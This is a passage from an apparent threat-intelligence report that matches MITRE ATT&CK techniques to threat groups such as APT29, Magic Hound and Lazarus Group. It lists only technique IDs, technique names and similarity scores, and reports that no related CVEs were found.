  • T1083 - File and Directory Discovery
  • T1561.001 - Disk Content Wipe
  • T1547.005 - Security Support Provider
  • T1584.002 - DNS Server
  • T1665 - Hide Infrastructure
  • T1055.004 - Asynchronous Procedure Call
  • T1590.006 - Network Security Appliances

APT29

Score: 0.60
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1027.004 - Compile After Delivery
  • T1070.006 - Timestomp
  • T1547.008 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1222.002 - Linux and Mac Permissions
  • T1547.011 - Plist Modification
  • T1556.008 - Network Provider DLL
  • T1202 - Indirect Command Execution

Magic Hound

Score: 0.60
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1546.012 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1562.001 - Disable or Modify Tools
  • T1070.006 - Timestomp
  • T1597 - Search Closed Sources
  • T1010 - Application Window Discovery
  • T1547.005 - Security Support Provider
  • T1016.002 - Wi-Fi Discovery
  • T1601.001 - Patch System Image
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay

Lazarus Group

Score: 0.59
Matched TTPs:
  • T1055.005 - Thread Local Storage
  • T1546.012 - Image File Execution Options Injection
  • T1562.001 - Disable or Modify Tools
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1059.001 - PowerShell
  • T1547.011 - Plist Modification
  • T1665 - Hide Infrastructure
  • T1069.001 - Local Groups
  • T1055.004 - Asynchronous Procedure Call
  • T1590.006 - Network Security Appliances
  • T1098.007 - Additional Local or Domain Groups

Related CVEs

No CVEs were found in this Pulse.
